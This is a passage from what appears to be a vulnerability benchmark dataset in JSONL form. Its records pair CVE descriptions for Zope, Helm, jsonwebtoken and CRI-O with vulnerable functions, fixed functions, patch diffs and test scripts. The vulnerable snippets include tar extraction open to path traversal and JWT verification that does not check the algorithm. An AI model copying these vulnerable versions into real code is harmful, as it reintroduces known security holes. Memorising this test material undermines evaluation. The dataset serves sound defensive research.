(url, sep, quote(came_from))\n resp.redirect(url, lock=1)\n resp.setHeader('Expires', 'Sat, 01 Jan 2000 00:00:00 GMT')\n resp.setHeader('Cache-Control', 'no-cache')\n return 1\n\n # Could not challenge.\n return 0"}], "fix_func": [{"id": "fix_py_368_1", "commit": "7eead067898852ebd3e0f143bc51295928528dfa", "file_path": "src/Products/PluggableAuthService/plugins/CookieAuthHelper.py", "start_line": 196, "end_line": 247, "snippet": " def unauthorized(self):\n req = self.REQUEST\n resp = req['RESPONSE']\n\n # If we set the auth cookie before, delete it now.\n if self.cookie_name in resp.cookies:\n del resp.cookies[self.cookie_name]\n\n # Redirect if desired.\n url = self.getLoginURL()\n if url is not None:\n came_from = req.get('came_from', None)\n\n if came_from is None:\n came_from = req.get('ACTUAL_URL', '')\n query = req.get('QUERY_STRING')\n if query:\n if not query.startswith('?'):\n query = '?' + query\n came_from = came_from + query\n else:\n # If came_from contains a value it means the user\n # must be coming through here a second time\n # Reasons could be typos when providing credentials\n # or a redirect loop (see below)\n req_url = req.get('ACTUAL_URL', '')\n\n if req_url and req_url == url:\n # Oops... The login_form cannot be reached by the user -\n # it might be protected itself due to misconfiguration -\n # the only sane thing to do is to give up because we are\n # in an endless redirect loop.\n return 0\n\n # Sanitize the return URL ``came_from`` and only allow local URLs\n # to prevent an open exploitable redirect issue\n if came_from:\n parsed = urlparse(came_from)\n came_from = urlunparse(('', '') + parsed[2:])\n\n if '?' in url:\n sep = '&'\n else:\n sep = '?'\n url = '%s%scame_from=%s' % (url, sep, quote(came_from))\n resp.redirect(url, lock=1)\n resp.setHeader('Expires', 'Sat, 01 Jan 2000 00:00:00 GMT')\n resp.setHeader('Cache-Control', 'no-cache')\n return 1\n\n # Could not challenge.\n return 0"}], "vul_patch": "--- a/src/Products/PluggableAuthService/plugins/CookieAuthHelper.py\n+++ b/src/Products/PluggableAuthService/plugins/CookieAuthHelper.py\n@@ -32,6 +32,12 @@\n # in an endless redirect loop.\n return 0\n \n+ # Sanitize the return URL ``came_from`` and only allow local URLs\n+ # to prevent an open exploitable redirect issue\n+ if came_from:\n+ parsed = urlparse(came_from)\n+ came_from = urlunparse(('', '') + parsed[2:])\n+\n if '?' in url:\n sep = '&'\n else:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-4053", "cve_description": "In Helm greater than or equal to 3.0.0 and less than 3.2.4, a path traversal attack is possible when installing Helm plugins from a tar archive over HTTP. It is possible for a malicious plugin author to inject a relative path into a plugin archive, and copy a file outside of the intended directory. This has been fixed in 3.2.4.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/helm/helm", "patch_url": ["https://github.com/helm/helm/commit/0ad800ef43d3b826f31a5ad8dfbb4fe05d143688", "https://github.com/helm/helm/commit/b6bbe4f08bbb98eadd6c9cd726b08a5c639908b3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_36_1", "commit": "8f83204", "file_path": "pkg/plugin/installer/http_installer.go", "start_line": 154, "end_line": 198, "snippet": "func (g *TarGzExtractor) Extract(buffer *bytes.Buffer, targetDir string) error {\n\tuncompressedStream, err := gzip.NewReader(buffer)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := os.MkdirAll(targetDir, 0755); err != nil {\n\t\treturn err\n\t}\n\n\ttarReader := tar.NewReader(uncompressedStream)\n\tfor {\n\t\theader, err := tarReader.Next()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tpath := filepath.Join(targetDir, header.Name)\n\n\t\tswitch header.Typeflag {\n\t\tcase tar.TypeDir:\n\t\t\tif err := os.Mkdir(path, 0755); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase tar.TypeReg:\n\t\t\toutFile, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif _, err := io.Copy(outFile, tarReader); err != nil {\n\t\t\t\toutFile.Close()\n\t\t\t\treturn err\n\t\t\t}\n\t\t\toutFile.Close()\n\t\t// We don't want to process these extension header files.\n\t\tcase tar.TypeXGlobalHeader, tar.TypeXHeader:\n\t\t\tcontinue\n\t\tdefault:\n\t\t\treturn errors.Errorf(\"unknown type: %b in %s\", header.Typeflag, header.Name)\n\t\t}\n\t}\n\treturn nil"}], "fix_func": [{"id": "fix_go_36_1", "commit": "0ad800e", "file_path": "pkg/plugin/installer/http_installer.go", "start_line": 171, "end_line": 255, "snippet": "func cleanJoin(root, dest string) (string, error) {\n\n\t// On Windows, this is a drive separator. On UNIX-like, this is the path list separator.\n\t// In neither case do we want to trust a TAR that contains these.\n\tif strings.Contains(dest, \":\") {\n\t\treturn \"\", errors.New(\"path contains ':', which is illegal\")\n\t}\n\n\t// The Go tar library does not convert separators for us.\n\t// We assume here, as we do elsewhere, that `\\\\` means a Windows path.\n\tdest = strings.ReplaceAll(dest, \"\\\\\", \"/\")\n\n\t// We want to alert the user that something bad was attempted. Cleaning it\n\t// is not a good practice.\n\tfor _, part := range strings.Split(dest, \"/\") {\n\t\tif part == \"..\" {\n\t\t\treturn \"\", errors.New(\"path contains '..', which is illegal\")\n\t\t}\n\t}\n\n\t// If a path is absolute, the creator of the TAR is doing something shady.\n\tif path.IsAbs(dest) {\n\t\treturn \"\", errors.New(\"path is absolute, which is illegal\")\n\t}\n\n\t// SecureJoin will do some cleaning, as well as some rudimentary checking of symlinks.\n\tnewpath, err := securejoin.SecureJoin(root, dest)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn filepath.ToSlash(newpath), nil\n}\n\n// Extract extracts compressed archives\n//\n// Implements Extractor.\nfunc (g *TarGzExtractor) Extract(buffer *bytes.Buffer, targetDir string) error {\n\tuncompressedStream, err := gzip.NewReader(buffer)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := os.MkdirAll(targetDir, 0755); err != nil {\n\t\treturn err\n\t}\n\n\ttarReader := tar.NewReader(uncompressedStream)\n\tfor {\n\t\theader, err := tarReader.Next()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tpath, err := cleanJoin(targetDir, header.Name)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tswitch header.Typeflag {\n\t\tcase tar.TypeDir:\n\t\t\tif err := os.Mkdir(path, 0755); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\tcase tar.TypeReg:\n\t\t\toutFile, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif _, err := io.Copy(outFile, tarReader); err != nil {\n\t\t\t\toutFile.Close()\n\t\t\t\treturn err\n\t\t\t}\n\t\t\toutFile.Close()\n\t\t// We don't want to process these extension header files.\n\t\tcase tar.TypeXGlobalHeader, tar.TypeXHeader:\n\t\t\tcontinue\n\t\tdefault:\n\t\t\treturn errors.Errorf(\"unknown type: %b in %s\", header.Typeflag, header.Name)\n\t\t}\n\t}\n\treturn nil"}], "vul_patch": "--- a/pkg/plugin/installer/http_installer.go\n+++ b/pkg/plugin/installer/http_installer.go\n@@ -1,3 +1,40 @@\n+func cleanJoin(root, dest string) (string, error) {\n+\n+\t// On Windows, this is a drive separator. On UNIX-like, this is the path list separator.\n+\t// In neither case do we want to trust a TAR that contains these.\n+\tif strings.Contains(dest, \":\") {\n+\t\treturn \"\", errors.New(\"path contains ':', which is illegal\")\n+\t}\n+\n+\t// The Go tar library does not convert separators for us.\n+\t// We assume here, as we do elsewhere, that `\\\\` means a Windows path.\n+\tdest = strings.ReplaceAll(dest, \"\\\\\", \"/\")\n+\n+\t// We want to alert the user that something bad was attempted. Cleaning it\n+\t// is not a good practice.\n+\tfor _, part := range strings.Split(dest, \"/\") {\n+\t\tif part == \"..\" {\n+\t\t\treturn \"\", errors.New(\"path contains '..', which is illegal\")\n+\t\t}\n+\t}\n+\n+\t// If a path is absolute, the creator of the TAR is doing something shady.\n+\tif path.IsAbs(dest) {\n+\t\treturn \"\", errors.New(\"path is absolute, which is illegal\")\n+\t}\n+\n+\t// SecureJoin will do some cleaning, as well as some rudimentary checking of symlinks.\n+\tnewpath, err := securejoin.SecureJoin(root, dest)\n+\tif err != nil {\n+\t\treturn \"\", err\n+\t}\n+\n+\treturn filepath.ToSlash(newpath), nil\n+}\n+\n+// Extract extracts compressed archives\n+//\n+// Implements Extractor.\n func (g *TarGzExtractor) Extract(buffer *bytes.Buffer, targetDir string) error {\n \tuncompressedStream, err := gzip.NewReader(buffer)\n \tif err != nil {\n@@ -18,7 +55,10 @@\n \t\t\treturn err\n \t\t}\n \n-\t\tpath := filepath.Join(targetDir, header.Name)\n+\t\tpath, err := cleanJoin(targetDir, header.Name)\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n \n \t\tswitch header.Typeflag {\n \t\tcase tar.TypeDir:\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-4053:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/helm\nrm -rf ./pkg/plugin/installer/http_installer_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestExtract$ helm.sh/helm/v3/pkg/plugin/installer\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-4053:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/helm\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestHTTPInstallerUpdate|TestHTTPInstaller|TestStripName|TestHTTPInstallerNonExistentVersion|TestExtract)$' helm.sh/helm/v3/pkg/plugin/installer"} {"cve_id": "CVE-2015-9235", "cve_description": "In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family).", "cwe_info": {"CWE-327": {"name": "Use of a Broken or Risky Cryptographic Algorithm", "description": "The product uses a broken or risky cryptographic algorithm or protocol."}}, "repo": "https://github.com/auth0/node-jsonwebtoken", "patch_url": ["https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_94_1", "commit": "f9f3c34", "file_path": "index.js", "start_line": "72", "end_line": "152", "snippet": "module.exports.verify = function(jwtString, secretOrPublicKey, options, callback) {\n if ((typeof options === 'function') && !callback) {\n callback = options;\n options = {};\n }\n\n if (!options) options = {};\n\n var done;\n\n if (callback) {\n done = function() {\n var args = Array.prototype.slice.call(arguments, 0);\n return process.nextTick(function() {\n callback.apply(null, args);\n });\n };\n } else {\n done = function(err, data) {\n if (err) throw err;\n return data;\n };\n }\n\n if (!jwtString){\n return done(new JsonWebTokenError('jwt must be provided'));\n }\n\n var parts = jwtString.split('.');\n\n if (parts.length !== 3){\n return done(new JsonWebTokenError('jwt malformed'));\n }\n\n if (parts[2].trim() === '' && secretOrPublicKey){\n return done(new JsonWebTokenError('jwt signature is required'));\n }\n\n var valid;\n\n try {\n valid = jws.verify(jwtString, secretOrPublicKey);\n } catch (e) {\n return done(e);\n }\n\n if (!valid)\n return done(new JsonWebTokenError('invalid signature'));\n\n var payload;\n\n try {\n payload = this.decode(jwtString);\n } catch(err) {\n return done(err);\n }\n\n if (typeof payload.exp !== 'undefined' && !options.ignoreExpiration) {\n if (typeof payload.exp !== 'number') {\n return done(new JsonWebTokenError('invalid exp value'));\n }\n if (Math.floor(Date.now() / 1000) >= payload.exp)\n return done(new TokenExpiredError('jwt expired', new Date(payload.exp * 1000)));\n }\n\n if (options.audience) {\n var audiences = Array.isArray(options.audience)? options.audience : [options.audience];\n var target = Array.isArray(payload.aud) ? payload.aud : [payload.aud];\n\n var match = target.some(function(aud) { return audiences.indexOf(aud) != -1; });\n\n if (!match)\n return done(new JsonWebTokenError('jwt audience invalid. expected: ' + audiences.join(' or ')));\n }\n\n if (options.issuer) {\n if (payload.iss !== options.issuer)\n return done(new JsonWebTokenError('jwt issuer invalid. expected: ' + options.issuer));\n }\n\n return done(null, payload);"}], "fix_func": [{"id": "fix_js_94_1", "commit": "1bb584b", "file_path": "index.js", "start_line": "72", "end_line": "163", "snippet": "module.exports.verify = function(jwtString, secretOrPublicKey, options, callback) {\n if ((typeof options === 'function') && !callback) {\n callback = options;\n options = {};\n }\n\n if (!options) options = {};\n\n var done;\n\n if (callback) {\n done = function() {\n var args = Array.prototype.slice.call(arguments, 0);\n return process.nextTick(function() {\n callback.apply(null, args);\n });\n };\n } else {\n done = function(err, data) {\n if (err) throw err;\n return data;\n };\n }\n\n if (!jwtString){\n return done(new JsonWebTokenError('jwt must be provided'));\n }\n\n var parts = jwtString.split('.');\n\n if (parts.length !== 3){\n return done(new JsonWebTokenError('jwt malformed'));\n }\n\n if (parts[2].trim() === '' && secretOrPublicKey){\n return done(new JsonWebTokenError('jwt signature is required'));\n }\n\n if (!options.algorithms) {\n options.algorithms = ~secretOrPublicKey.toString().indexOf('BEGIN CERTIFICATE') ?\n [ 'RS256','RS384','RS512','ES256','ES384','ES512' ] :\n [ 'HS256','HS384','HS512' ];\n }\n\n var valid;\n\n try {\n valid = jws.verify(jwtString, secretOrPublicKey);\n } catch (e) {\n return done(e);\n }\n\n if (!valid)\n return done(new JsonWebTokenError('invalid signature'));\n\n var payload;\n\n try {\n payload = this.decode(jwtString);\n } catch(err) {\n return done(err);\n }\n\n var header = jws.decode(jwtString).header;\n if (!~options.algorithms.indexOf(header.alg)) {\n return done(new JsonWebTokenError('invalid signature'));\n }\n\n if (typeof payload.exp !== 'undefined' && !options.ignoreExpiration) {\n if (typeof payload.exp !== 'number') {\n return done(new JsonWebTokenError('invalid exp value'));\n }\n if (Math.floor(Date.now() / 1000) >= payload.exp)\n return done(new TokenExpiredError('jwt expired', new Date(payload.exp * 1000)));\n }\n\n if (options.audience) {\n var audiences = Array.isArray(options.audience)? options.audience : [options.audience];\n var target = Array.isArray(payload.aud) ? payload.aud : [payload.aud];\n\n var match = target.some(function(aud) { return audiences.indexOf(aud) != -1; });\n\n if (!match)\n return done(new JsonWebTokenError('jwt audience invalid. expected: ' + audiences.join(' or ')));\n }\n\n if (options.issuer) {\n if (payload.iss !== options.issuer)\n return done(new JsonWebTokenError('jwt issuer invalid. expected: ' + options.issuer));\n }\n\n return done(null, payload);"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -36,6 +36,12 @@\n return done(new JsonWebTokenError('jwt signature is required'));\n }\n \n+ if (!options.algorithms) {\n+ options.algorithms = ~secretOrPublicKey.toString().indexOf('BEGIN CERTIFICATE') ?\n+ [ 'RS256','RS384','RS512','ES256','ES384','ES512' ] :\n+ [ 'HS256','HS384','HS512' ];\n+ }\n+\n var valid;\n \n try {\n@@ -53,6 +59,11 @@\n payload = this.decode(jwtString);\n } catch(err) {\n return done(err);\n+ }\n+\n+ var header = jws.decode(jwtString).header;\n+ if (!~options.algorithms.indexOf(header.alg)) {\n+ return done(new JsonWebTokenError('invalid signature'));\n }\n \n if (typeof payload.exp !== 'undefined' && !options.ignoreExpiration) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-8676", "cve_description": "A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/cri-o/cri-o", "patch_url": ["https://github.com/cri-o/cri-o/commit/e8e7dcb7838d11b5157976bf3e31a5840bb77de7"], "programing_language": "Go", "vul_func": [{"id": "vul_go_161_1", "commit": "be3a1aa", "file_path": "server/container_restore.go", "start_line": 54, "end_line": 426, "snippet": "func (s *Server) CRImportCheckpoint(\n\tctx context.Context,\n\tcreateConfig *types.ContainerConfig,\n\tsb *sandbox.Sandbox, sandboxUID string,\n) (ctrID string, retErr error) {\n\tvar mountPoint string\n\n\t// Ensure that the image to restore the checkpoint from has been provided.\n\tif createConfig.Image == nil || createConfig.Image.Image == \"\" {\n\t\treturn \"\", errors.New(`attribute \"image\" missing from container definition`)\n\t}\n\n\tinputImage := createConfig.Image.Image\n\tcreateMounts := createConfig.Mounts\n\tcreateAnnotations := createConfig.Annotations\n\tcreateLabels := createConfig.Labels\n\n\trestoreStorageImageID, err := s.checkIfCheckpointOCIImage(ctx, inputImage)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar restoreArchivePath string\n\tif restoreStorageImageID != nil {\n\t\tsystemCtx, err := s.contextForNamespace(sb.Metadata().Namespace)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"get context for namespace: %w\", err)\n\t\t}\n\t\t// WARNING: This hard-codes an assumption that SignaturePolicyPath set specifically for the namespace is never less restrictive\n\t\t// than the default system-wide policy, i.e. that if an image is successfully pulled, it always conforms to the system-wide policy.\n\t\tif systemCtx.SignaturePolicyPath != \"\" {\n\t\t\treturn \"\", fmt.Errorf(\"namespaced signature policy %s defined for pods in namespace %s; signature validation is not supported for container restore\", systemCtx.SignaturePolicyPath, sb.Metadata().Namespace)\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Restoring from oci image %s\", inputImage)\n\n\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\tmountPoint, err = s.ContainerServer.StorageImageServer().GetStore().MountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), nil, \"\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Checkpoint image %s mounted at %v\\n\", restoreStorageImageID, mountPoint)\n\n\t\tdefer func() {\n\t\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\t\tif _, err := s.ContainerServer.StorageImageServer().GetStore().UnmountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), true); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not unmount checkpoint image %s: %q\", restoreStorageImageID, err)\n\t\t\t}\n\t\t}()\n\t} else {\n\t\t// First get the container definition from the\n\t\t// tarball to a temporary directory\n\t\tarchiveFile, err := os.Open(inputImage)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to open checkpoint archive %s for import: %w\", inputImage, err)\n\t\t}\n\t\tdefer func(f *os.File) {\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Unable to close file %s: %q\", f.Name(), err)\n\t\t\t}\n\t\t}(archiveFile)\n\n\t\trestoreArchivePath = inputImage\n\t\toptions := &archive.TarOptions{\n\t\t\t// Here we only need the files config.dump and spec.dump\n\t\t\tExcludePatterns: []string{\n\t\t\t\t\"artifacts\",\n\t\t\t\t\"ctr.log\",\n\t\t\t\tmetadata.RootFsDiffTar,\n\t\t\t\tmetadata.NetworkStatusFile,\n\t\t\t\tmetadata.DeletedFilesFile,\n\t\t\t\tmetadata.CheckpointDirectory,\n\t\t\t},\n\t\t}\n\t\tmountPoint, err = os.MkdirTemp(\"\", \"checkpoint\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := os.RemoveAll(mountPoint); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not recursively remove %s: %q\", mountPoint, err)\n\t\t\t}\n\t\t}()\n\t\terr = archive.Untar(archiveFile, mountPoint, options)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"unpacking of checkpoint archive %s failed: %w\", mountPoint, err)\n\t\t}\n\t\tlog.Debugf(ctx, \"Unpacked checkpoint in %s\", mountPoint)\n\t}\n\n\t// Load spec.dump from temporary directory\n\tdumpSpec := new(spec.Spec)\n\tif _, err := metadata.ReadJSONFile(dumpSpec, mountPoint, metadata.SpecDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.SpecDumpFile, err)\n\t}\n\n\t// Load config.dump from temporary directory\n\tconfig := new(metadata.ContainerConfig)\n\tif _, err := metadata.ReadJSONFile(config, mountPoint, metadata.ConfigDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.ConfigDumpFile, err)\n\t}\n\n\tctrMetadata := types.ContainerMetadata{}\n\toriginalAnnotations := make(map[string]string)\n\toriginalLabels := make(map[string]string)\n\n\tif dumpSpec.Annotations[annotations.ContainerManager] == \"libpod\" {\n\t\t// This is an import from Podman\n\t\tctrMetadata.Name = config.Name\n\t\tctrMetadata.Attempt = 0\n\t} else {\n\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Metadata]), &ctrMetadata); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Metadata, err)\n\t\t}\n\t\tif createConfig.Metadata != nil && createConfig.Metadata.Name != \"\" {\n\t\t\tctrMetadata.Name = createConfig.Metadata.Name\n\t\t}\n\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n\t\t}\n\n\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Labels]), &originalLabels); err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Labels, err)\n\t\t}\n\t\tif sandboxUID != \"\" {\n\t\t\tif _, ok := originalLabels[kubetypes.KubernetesPodUIDLabel]; ok {\n\t\t\t\toriginalLabels[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n\t\t\t}\n\t\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n\t\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n\t\t\t}\n\t\t}\n\n\t\tif createLabels != nil {\n\t\t\tfixupLabels := []string{\n\t\t\t\t// Update the container name. It has already been update in metadata.Name.\n\t\t\t\t// It also needs to be updated in the container labels.\n\t\t\t\tkubetypes.KubernetesContainerNameLabel,\n\t\t\t\t// Update pod name in the labels.\n\t\t\t\tkubetypes.KubernetesPodNameLabel,\n\t\t\t\t// Also update namespace.\n\t\t\t\tkubetypes.KubernetesPodNamespaceLabel,\n\t\t\t}\n\n\t\t\tfor _, annotation := range fixupLabels {\n\t\t\t\t_, ok1 := createLabels[annotation]\n\t\t\t\t_, ok2 := originalLabels[annotation]\n\n\t\t\t\t// If the value is not set in the original container or\n\t\t\t\t// if it is not set in the new container, just skip\n\t\t\t\t// the step of updating metadata.\n\t\t\t\tif ok1 && ok2 {\n\t\t\t\t\toriginalLabels[annotation] = createLabels[annotation]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif createAnnotations != nil {\n\t\t\t// The hash also needs to be update or Kubernetes thinks the container needs to be restarted\n\t\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n\n\t\t\tif ok1 && ok2 {\n\t\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t\t}\n\t\t}\n\t}\n\n\tstopMutex := sb.StopMutex()\n\tstopMutex.RLock()\n\tdefer stopMutex.RUnlock()\n\tif sb.Stopped() {\n\t\treturn \"\", fmt.Errorf(\"CreateContainer failed as the sandbox was stopped: %s\", sb.ID())\n\t}\n\n\tctr, err := container.New()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to create container: %w\", err)\n\t}\n\n\t// Newer checkpoints archives have RootfsImageRef set\n\t// and using it for the restore is more correct.\n\t// For the Kubernetes use case the output of 'crictl ps'\n\t// contains for the original container under 'IMAGE' something\n\t// like 'registry/path/container@sha256:123444444...'.\n\t// The restored container was, however, only displaying something\n\t// like 'registry/path/container'.\n\t// This had two problems, first, the output from the restored\n\t// container was different, but the bigger problem was, that\n\t// CRI-O might pull the wrong image from the registry.\n\t// If the container in the registry was updated (new latest tag)\n\t// all of a sudden the wrong base image would be downloaded.\n\trootFSImage := config.RootfsImageName\n\tif config.RootfsImageRef != \"\" {\n\t\tid, err := storage.ParseStorageImageIDFromOutOfProcessData(config.RootfsImageRef)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"invalid RootfsImageRef %q: %w\", config.RootfsImageRef, err)\n\t\t}\n\t\t// This is not quite out-of-process consumption, but types.ContainerConfig is at least\n\t\t// a cross-process API, and this value is correct in that API.\n\t\trootFSImage = id.IDStringForOutOfProcessConsumptionOnly()\n\t}\n\tcontainerConfig := &types.ContainerConfig{\n\t\tMetadata: &types.ContainerMetadata{\n\t\t\tName: ctrMetadata.Name,\n\t\t\tAttempt: ctrMetadata.Attempt,\n\t\t},\n\t\tImage: &types.ImageSpec{\n\t\t\tImage: rootFSImage,\n\t\t},\n\t\tLinux: &types.LinuxContainerConfig{\n\t\t\tResources: &types.LinuxContainerResources{},\n\t\t\tSecurityContext: &types.LinuxContainerSecurityContext{},\n\t\t},\n\t\tAnnotations: originalAnnotations,\n\t\tLabels: originalLabels,\n\t}\n\n\tif createConfig.Linux != nil {\n\t\tif createConfig.Linux.Resources != nil {\n\t\t\tcontainerConfig.Linux.Resources = createConfig.Linux.Resources\n\t\t}\n\n\t\tif createConfig.Linux.SecurityContext != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext = createConfig.Linux.SecurityContext\n\t\t}\n\t}\n\n\tif dumpSpec.Linux != nil {\n\t\tif dumpSpec.Linux.MaskedPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.MaskedPaths = dumpSpec.Linux.MaskedPaths\n\t\t}\n\n\t\tif dumpSpec.Linux.ReadonlyPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.ReadonlyPaths = dumpSpec.Linux.ReadonlyPaths\n\t\t}\n\t}\n\n\tignoreMounts := map[string]bool{\n\t\t\"/proc\": true,\n\t\t\"/dev\": true,\n\t\t\"/dev/pts\": true,\n\t\t\"/dev/mqueue\": true,\n\t\t\"/sys\": true,\n\t\t\"/sys/fs/cgroup\": true,\n\t\t\"/dev/shm\": true,\n\t\t\"/etc/resolv.conf\": true,\n\t\t\"/etc/hostname\": true,\n\t\t\"/run/secrets\": true,\n\t\t\"/run/.containerenv\": true,\n\t}\n\n\tfor _, m := range dumpSpec.Mounts {\n\t\t// Following mounts are ignored as they might point to the\n\t\t// wrong location and if ignored the mounts will correctly\n\t\t// be setup to point to the new location.\n\t\tif ignoreMounts[m.Destination] {\n\t\t\tcontinue\n\t\t}\n\t\tmount := &types.Mount{\n\t\t\tContainerPath: m.Destination,\n\t\t\tHostPath: m.Source,\n\t\t}\n\n\t\tfor _, createMount := range createMounts {\n\t\t\tif createMount.ContainerPath == m.Destination {\n\t\t\t\tmount.HostPath = createMount.HostPath\n\t\t\t}\n\t\t}\n\n\t\tfor _, opt := range m.Options {\n\t\t\tswitch opt {\n\t\t\tcase \"ro\":\n\t\t\t\tmount.Readonly = true\n\t\t\tcase \"rro\":\n\t\t\t\tmount.RecursiveReadOnly = true\n\t\t\tcase \"rprivate\":\n\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n\t\t\tcase \"rshared\":\n\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_BIDIRECTIONAL\n\t\t\tcase \"rslaved\":\n\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_HOST_TO_CONTAINER\n\t\t\t}\n\t\t}\n\n\t\t// Recursive Read-only (RRO) support requires the mount to be\n\t\t// read-only and the mount propagation set to private.\n\t\tif mount.RecursiveReadOnly {\n\t\t\tmount.Readonly = true\n\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Adding mounts %#v\", mount)\n\t\tcontainerConfig.Mounts = append(containerConfig.Mounts, mount)\n\t}\n\tsandboxConfig := &types.PodSandboxConfig{\n\t\tMetadata: &types.PodSandboxMetadata{\n\t\t\tName: sb.Metadata().Name,\n\t\t\tUid: sb.Metadata().Uid,\n\t\t\tNamespace: sb.Metadata().Namespace,\n\t\t\tAttempt: sb.Metadata().Attempt,\n\t\t},\n\t\tLinux: &types.LinuxPodSandboxConfig{},\n\t}\n\n\tif err := ctr.SetConfig(containerConfig, sandboxConfig); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container config: %w\", err)\n\t}\n\n\tif err 